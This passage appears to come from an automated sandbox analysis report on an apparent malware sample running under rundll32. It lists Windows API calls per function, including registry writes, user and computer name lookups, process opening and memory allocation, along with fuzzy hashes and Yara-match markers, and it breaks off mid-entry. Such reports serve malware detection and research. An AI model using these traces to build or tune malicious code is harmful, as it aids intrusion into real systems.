                            • API String ID: 4263211335-0
                            • Opcode ID: 16bc41fdd5a0cddd6be5fa735c715b4c4781b3beefa8af21379fff52b608f5c6
                            • Instruction ID: a392ab5bb3c2a375e742295249c49b2f16e23d28fc26255ec3ab9df43fdfb3f1
                            • Opcode Fuzzy Hash: 16bc41fdd5a0cddd6be5fa735c715b4c4781b3beefa8af21379fff52b608f5c6
                            • Instruction Fuzzy Hash: C5214F7690021DBFCB01AFA5EC889EE7B79FF44310F51802AF916DA140DB749A59CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04F6E231,00000000,7620F5B0,04F70348,?,00000001), ref: 04F71C25
                            • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 04F71C3B
                            • _snwprintf.NTDLL ref: 04F71C60
                            • CreateFileMappingW.KERNEL32(000000FF,04F8A1E8,00000004,00000000,00001000,?), ref: 04F71C7C
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04F71C8E
                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04F71CA5
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 04F71CC6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04F71CCE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1814172918-0
                            • Opcode ID: 5479a5888e4d3fcb81cd18a11c9423e92d41e8d7b5185c817bc58d43095c3bfb
                            • Instruction ID: 78cad1be818dca9f18f8856e4dc1539163aac6df3f7eb1f8049266a87ec25199
                            • Opcode Fuzzy Hash: 5479a5888e4d3fcb81cd18a11c9423e92d41e8d7b5185c817bc58d43095c3bfb
                            • Instruction Fuzzy Hash: 4421D872B40208FBD721AF94DD05FED3BB9EB44750F204026F615EB280E674E906DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(00000000,?,06319A2B,?,?,06319A2B,?,?,06319A2B,?,?,06319A2B,?,00000000,00000000,00000000), ref: 04F7CC58
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F7CC7B
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 04F7CC83
                            • lstrlenW.KERNEL32(00000000,?,06319A2B,?,?,06319A2B,?,?,06319A2B,?,?,06319A2B,?,?,06319A2B,?), ref: 04F7CCCE
                            • memcpy.NTDLL(00000000,?,?,?), ref: 04F7CD36
                            • LocalFree.KERNEL32(?,?), ref: 04F7CD4F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                            • String ID: P
                            • API String ID: 3649579052-3110715001
                            • Opcode ID: b6a60912b7e9982668cd1721fa312346f210635ff79fca0bd0133db0a8d87cee
                            • Instruction ID: 4ab43083b1d5bc355ed92cbfa8a30c6854e1681afea7e8a1e604f5f614906a1c
                            • Opcode Fuzzy Hash: b6a60912b7e9982668cd1721fa312346f210635ff79fca0bd0133db0a8d87cee
                            • Instruction Fuzzy Hash: D8613F71E0014EAFDF11DFA9EC88DBE7BB9EF45704B04806AF515AB250D738A906DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F8148E: InterlockedIncrement.KERNEL32(00000018), ref: 04F814DF
                              • Part of subcall function 04F8148E: RtlLeaveCriticalSection.NTDLL(0631C378), ref: 04F8156A
                            • OpenProcess.KERNEL32(00000410,B8F475FF,04F72289,00000000,00000000,04F72289,0000001C,00000000,00000000,?,?,?,04F72289), ref: 04F7C5BD
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,04F72299,00000104,?,?,?,04F72289), ref: 04F7C5DB
                            • GetSystemTimeAsFileTime.KERNEL32(04F72289), ref: 04F7C643
                            • lstrlenW.KERNEL32(C78BC933), ref: 04F7C6B8
                            • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 04F7C6D4
                            • memcpy.NTDLL(00000014,C78BC933,00000002), ref: 04F7C6EC
                              • Part of subcall function 04F6F307: RtlLeaveCriticalSection.NTDLL(?), ref: 04F6F384
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                            • String ID: o
                            • API String ID: 2541713525-252678980
                            • Opcode ID: 8ed8e85d755db8186cda8d55ce9626c63a2733936eec534d86e98388974fd9e2
                            • Instruction ID: 5b52fec2b76512280a35f7057bfc66ed971d697decc18ef2c6562bcb32960613
                            • Opcode Fuzzy Hash: 8ed8e85d755db8186cda8d55ce9626c63a2733936eec534d86e98388974fd9e2
                            • Instruction Fuzzy Hash: 4D5172B1A1064AABD710DF64DC88FAAB7E8FF04704F10452AE509DB140EB78E9468B94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04F6A391
                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04F6A3BD
                            • _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 04F6A3CD
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 04F6A405
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 04F6A427
                            • GetShellWindow.USER32 ref: 04F6A436
                              • Part of subcall function 04F72986: GetShellWindow.USER32 ref: 04F729A4
                              • Part of subcall function 04F72986: GetVersion.KERNEL32 ref: 04F72A46
                              • Part of subcall function 04F72986: GetVersion.KERNEL32 ref: 04F72A54
                            • GetLastError.KERNEL32(?), ref: 04F6A521
                            • CloseHandle.KERNEL32(?), ref: 04F6A535
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TimerWaitable$ShellVersionWindow$CloseCreateErrorHandleLastMultipleObjectsWait_allmul
                            • String ID:
                            • API String ID: 2436285880-0
                            • Opcode ID: f7c902b5f6ad1af9ffe733accf7eeefc5646942b9c59f201c9d2626b15a9d420
                            • Instruction ID: 2e49cfec8647b5a14175d943112257e106351af92f5db115f218d5079ec7afc5
                            • Opcode Fuzzy Hash: f7c902b5f6ad1af9ffe733accf7eeefc5646942b9c59f201c9d2626b15a9d420
                            • Instruction Fuzzy Hash: C27169B1908305AFD710EF64DC8486BBBE9FB89354F004A2EF596E7250D330ED468B62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7B7A4: RegCreateKeyA.ADVAPI32(80000001,0631B7F0,?), ref: 04F7B7B9
                              • Part of subcall function 04F7B7A4: lstrlen.KERNEL32(0631B7F0,00000000,00000000,00000000,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008,00000003), ref: 04F7B7E2
                            • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04F67AA6
                            • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04F67ABE
                            • HeapFree.KERNEL32(00000000,?,?,04F787CC,?,?), ref: 04F67B20
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F67B34
                            • WaitForSingleObject.KERNEL32(00000000,?,04F787CC,?,?), ref: 04F67B86
                            • HeapFree.KERNEL32(00000000,?,?,04F787CC,?,?), ref: 04F67BAF
                            • HeapFree.KERNEL32(00000000,?,?,04F787CC,?,?), ref: 04F67BBF
                            • RegCloseKey.ADVAPI32(?,?,04F787CC,?,?), ref: 04F67BC8
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                            • String ID:
                            • API String ID: 3503961013-0
                            • Opcode ID: eda82196eedbf74b6b7f98560a19ba121fe57b0738207ea4028381e897482611
                            • Instruction ID: 9a05442b0de93e1f19b436ed5f07b6dd27ffa067849ee03ee63552fb59d3b79d
                            • Opcode Fuzzy Hash: eda82196eedbf74b6b7f98560a19ba121fe57b0738207ea4028381e897482611
                            • Instruction Fuzzy Hash: 2541A4B5D0021DFFDF01AFA4DC848EEBBB9FF08318F10446AE516A6210D6395A95EF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,04F6A1A1), ref: 04F6AAC5
                            • wsprintfA.USER32 ref: 04F6AAED
                            • lstrlen.KERNEL32(?), ref: 04F6AAFC
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            • wsprintfA.USER32 ref: 04F6AB3C
                            • wsprintfA.USER32 ref: 04F6AB71
                            • memcpy.NTDLL(00000000,?,?), ref: 04F6AB7E
                            • memcpy.NTDLL(00000008,04F853E8,00000002,00000000,?,?), ref: 04F6AB93
                            • wsprintfA.USER32 ref: 04F6ABB6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                            • String ID:
                            • API String ID: 2937943280-0
                            • Opcode ID: 7887d1d263893e784c0eb795011f3993e58cd169404c6ac94be132c563e203cc
                            • Instruction ID: 4eba03811b2740114ea84372c977df26ac23808d83eaf17270e55c2e716e00d7
                            • Opcode Fuzzy Hash: 7887d1d263893e784c0eb795011f3993e58cd169404c6ac94be132c563e203cc
                            • Instruction Fuzzy Hash: 2C410CB1A00209EFDB11DF98D884EAEB7FDEF45308B144559F959EB211EA34FA05CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 04F816F0
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81703
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 04F81715
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04F76C8E), ref: 04F81739
                            • GetComputerNameW.KERNEL32(00000000,?), ref: 04F81747
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F8175E
                            • GetComputerNameW.KERNEL32(00000000,?), ref: 04F8176F
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,04F76C8E), ref: 04F81795
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapName$AllocateComputerFreeUser
                            • String ID:
                            • API String ID: 3239747167-0
                            • Opcode ID: bddab8a3df43fce26d785baa66147e09d629509239d0393337d46ba537ee1c91
                            • Instruction ID: b2e5adc235a3f976e0b99eb8c46305bc82a7a9c07aa4bff087be7218122f0734
                            • Opcode Fuzzy Hash: bddab8a3df43fce26d785baa66147e09d629509239d0393337d46ba537ee1c91
                            • Instruction Fuzzy Hash: 0531DCB6A0010DAFDB00EFB5ED84CBEBBFAEB44244B50856DE505DB200D734AE469B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?), ref: 04F763F5
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F76407
                            • wcstombs.NTDLL ref: 04F76415
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?), ref: 04F76439
                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04F7644E
                            • mbstowcs.NTDLL ref: 04F7645B
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?,?), ref: 04F7646D
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?,?), ref: 04F76487
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                            • String ID:
                            • API String ID: 316328430-0
                            • Opcode ID: bfc7284513b56d34f3d29a891ac8a58383779b486d0eef8cf6348f859ef3232a
                            • Instruction ID: b00f916154aa54f6fc3c234b8a6f6cdffa6b55e32ba4d9e489075907bd9f5b25
                            • Opcode Fuzzy Hash: bfc7284513b56d34f3d29a891ac8a58383779b486d0eef8cf6348f859ef3232a
                            • Instruction Fuzzy Hash: 6F212C7190020EFFDF119FA4EC48EAB7BB9EB44314F10412ABA14EA160D7799D65EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(04F7E453,00000000,00000000,04F8A440,?,?,04F6F68B,04F7E453,00000000,04F7E453,04F8A420), ref: 04F6D935
                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04F6D943
                            • wsprintfA.USER32 ref: 04F6D95F
                            • RegCreateKeyA.ADVAPI32(80000001,04F8A420,00000000), ref: 04F6D977
                            • lstrlen.KERNEL32(?), ref: 04F6D986
                            • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 04F6D994
                            • RegCloseKey.ADVAPI32(?), ref: 04F6D99F
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6D9AE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                            • String ID:
                            • API String ID: 1575615994-0
                            • Opcode ID: 7f5b68b20088bd34a3c6342757b7f833cfe089b46ecf9c7bdbbee55699e3d5ce
                            • Instruction ID: 54f001cf3950b8fd9e9c55d07ff279170cbbe9f2ed77acf2b9ffea85f7c746e9
                            • Opcode Fuzzy Hash: 7f5b68b20088bd34a3c6342757b7f833cfe089b46ecf9c7bdbbee55699e3d5ce
                            • Instruction Fuzzy Hash: CC111B7260010DBFEB015F94FC49EBA3B79EB89714F104029FA059A150D6B99D55ABA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • OpenProcess.KERNEL32(00000040,00000000,?), ref: 04F7FE12
                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04F7FE30
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F7FE38
                            • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 04F7FE56
                            • GetLastError.KERNEL32 ref: 04F7FE6A
                            • RegCloseKey.ADVAPI32(?), ref: 04F7FE75
                            • CloseHandle.KERNEL32(00000000), ref: 04F7FE7C
                            • GetLastError.KERNEL32 ref: 04F7FE84
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                            • String ID:
                            • API String ID: 3822162776-0
                            • Opcode ID: 6a325338f03a876163bbd8326ff7b3cd5735516ceedc2c1aac6fb7abf2ceb22f
                            • Instruction ID: 83a7f30ffa3657466b5b0bf0d7d7538972bfbc5babbcc8353590d36bf026386d
                            • Opcode Fuzzy Hash: 6a325338f03a876163bbd8326ff7b3cd5735516ceedc2c1aac6fb7abf2ceb22f
                            • Instruction Fuzzy Hash: 20111B7620020DBFDB015FA4EC48EBA3B69EB88351F10502AFA06CA241DB79DD55DB71
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: f9f596bc778bdef9721547396155503a683b6e4b673773cd59f87a34907562b6
                            • Instruction ID: 37d62c227d852c5a6ff6b72082ac8ea0cda28483466866aaab5bd8acf666b27f
                            • Opcode Fuzzy Hash: f9f596bc778bdef9721547396155503a683b6e4b673773cd59f87a34907562b6
                            • Instruction Fuzzy Hash: 0DB103B1D00219EFEF219FA4DD48AAEBBB5EF05314F004066E812B7160D7B5AE46DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memcpy.NTDLL(?,?,0000000D,?,?,00000000,?,?,?,?,?,?,?,?,04F82801,?), ref: 04F8242E
                            • memcpy.NTDLL(?,?,0000000D,?,?,0000000D,?,?,00000000), ref: 04F8243B
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memcpy.NTDLL(00000000,?,?,00000008,?,00000001,04F82801,00000000,00000001,?,?,?,?,04F82801,?,00000000), ref: 04F825C9
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$AllocateHeap
                            • String ID:
                            • API String ID: 4068229299-0
                            • Opcode ID: ed9614d03ae4fb573294049ce2ed80e763d78e57c8ce7181edf82aaac56b1f23
                            • Instruction ID: 364c39aec6ae2db64b17e8f82163f1be1de21aa9ea67f360db1dc270e72f37e4
                            • Opcode Fuzzy Hash: ed9614d03ae4fb573294049ce2ed80e763d78e57c8ce7181edf82aaac56b1f23
                            • Instruction Fuzzy Hash: 3AB11D71A0020AABDF11EF95DD80EAF77A9BF04304F0581A9F915AF151E734FA16CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCommandLineA.KERNEL32(04F860F0,00000038,04F6E22A,00000000,7620F5B0,04F70348,?,00000001,?,?,?,?,?,?,?,04F69100), ref: 04F6BA7C
                            • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F6BA8D
                              • Part of subcall function 04F6D4DA: lstrlen.KERNEL32(?,00000000,761B6980,00000000,04F6DA7B,?), ref: 04F6D4E3
                              • Part of subcall function 04F6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 04F6D506
                              • Part of subcall function 04F6D4DA: memset.NTDLL ref: 04F6D515
                            • ExitProcess.KERNEL32 ref: 04F6BC6F
                              • Part of subcall function 04F6A8E9: StrChrA.SHLWAPI(00000020,?,76ECD3B0,0631C304,00000000,?,04F66584,?), ref: 04F6A90E
                              • Part of subcall function 04F6A8E9: StrTrimA.SHLWAPI(00000020,04F85FCC,00000000,?,04F66584,?), ref: 04F6A92D
                              • Part of subcall function 04F6A8E9: StrChrA.SHLWAPI(00000020,?,?,04F66584,?), ref: 04F6A939
                            • lstrcmp.KERNEL32(?,?), ref: 04F6BAFB
                            • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,04F69100,?), ref: 04F6BB13
                              • Part of subcall function 04F64BC4: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0631B7F0,?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000), ref: 04F64C04
                              • Part of subcall function 04F64BC4: CloseHandle.KERNEL32(000000FF,?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C), ref: 04F64C0F
                            • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,04F69100,?), ref: 04F6BB85
                            • lstrcmp.KERNEL32(?,?), ref: 04F6BB9E
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                            • String ID:
                            • API String ID: 739714153-0
                            • Opcode ID: 0fbea2f19f16c077fef3d549b1786fefa347df1f47954734150f87c094629c72
                            • Instruction ID: f2b76d7836726fa537d7e77475bc21787759c9b6c8f781449eecfcee59263911
                            • Opcode Fuzzy Hash: 0fbea2f19f16c077fef3d549b1786fefa347df1f47954734150f87c094629c72
                            • Instruction Fuzzy Hash: FE513071D10229EFDF11AFA0DC85DEEBB79EF09704F144429E112EA154DB39BA42CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 04F794B7
                            • StrTrimA.SHLWAPI(00000000,?), ref: 04F794D4
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F79507
                            • RtlImageNtHeader.NTDLL(00000000), ref: 04F79532
                            • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 04F795F7
                              • Part of subcall function 04F6D4DA: lstrlen.KERNEL32(?,00000000,761B6980,00000000,04F6DA7B,?), ref: 04F6D4E3
                              • Part of subcall function 04F6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 04F6D506
                              • Part of subcall function 04F6D4DA: memset.NTDLL ref: 04F6D515
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 04F795A8
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 04F795D7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                            • String ID:
                            • API String ID: 239510280-0
                            • Opcode ID: 1d00c9907d75e99fcb6417ece8645387fb7a01d6398613ea51d27e227a703d4d
                            • Instruction ID: 49b863bb336ae2058cbc1fc30fb212f926ce67fa1b94631b123cf3069e139c58
                            • Opcode Fuzzy Hash: 1d00c9907d75e99fcb6417ece8645387fb7a01d6398613ea51d27e227a703d4d
                            • Instruction Fuzzy Hash: 97418471B00219BBFB125F54EC45FAE7BA9EF44744F10406AF605AF180DBB9AE42D750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D6F2
                            • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D710
                            • RtlAllocateHeap.NTDLL(00000000,761B6985,?), ref: 04F7D73C
                            • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D753
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7D766
                            • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D775
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,04F61785,?,?,?), ref: 04F7D7D9
                              • Part of subcall function 04F6F307: RtlLeaveCriticalSection.NTDLL(?), ref: 04F6F384
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                            • String ID:
                            • API String ID: 1635816815-0
                            • Opcode ID: 97596961bb85f601f5e659775c94fba6062079b2fc9523f00a6027935dfc9c60
                            • Instruction ID: b8f41c825ef9ed072849312b702c81f2e02e4c431c48b65df399d54a9f64cf97
                            • Opcode Fuzzy Hash: 97596961bb85f601f5e659775c94fba6062079b2fc9523f00a6027935dfc9c60
                            • Instruction Fuzzy Hash: FB41A431A00219AFDF21AFA8DC84BAEBBB5EF04354F44456AF805AB150D778ED52DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlImageNtHeader.NTDLL ref: 04F745B6
                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04F745F9
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F74614
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 04F7466A
                            • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 04F746C6
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 04F746D4
                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F746DF
                              • Part of subcall function 04F626D3: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04F626E7
                              • Part of subcall function 04F626D3: memcpy.NTDLL(00000000,?,?,?), ref: 04F62710
                              • Part of subcall function 04F626D3: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 04F62739
                              • Part of subcall function 04F626D3: RegCloseKey.ADVAPI32(?), ref: 04F62764
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                            • String ID:
                            • API String ID: 3181710096-0
                            • Opcode ID: 1f287ae006d77b95fd083cbb8dcaac6eaf4c02f3a36ccdee65d8a340bd9433e3
                            • Instruction ID: 8d95b9d34bde341211eb4ab5873a6e09dd54067c5cf0966c093b00f26639c6cc
                            • Opcode Fuzzy Hash: 1f287ae006d77b95fd083cbb8dcaac6eaf4c02f3a36ccdee65d8a340bd9433e3
                            • Instruction Fuzzy Hash: 17417F72A00209EBDB119F65EC88F7A7BA8FF44745F04402AF905DA150DB79ED42DFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 04F81AED
                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 04F81B1B
                            • GetWindowThreadProcessId.USER32(?,?), ref: 04F81B60
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04F81B88
                            • _strupr.NTDLL ref: 04F81BB3
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 04F81BC0
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 04F81BDA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                            • String ID:
                            • API String ID: 3831658075-0
                            • Opcode ID: 4a5bb292ded357f6e578403dae0b5d57cbe689b13b985808ed9dccd30841558b
                            • Instruction ID: 31a3d61d7ce4a401aa911a23b67c7f90de7408fcd3a1c28fade292b7fbabf0d4
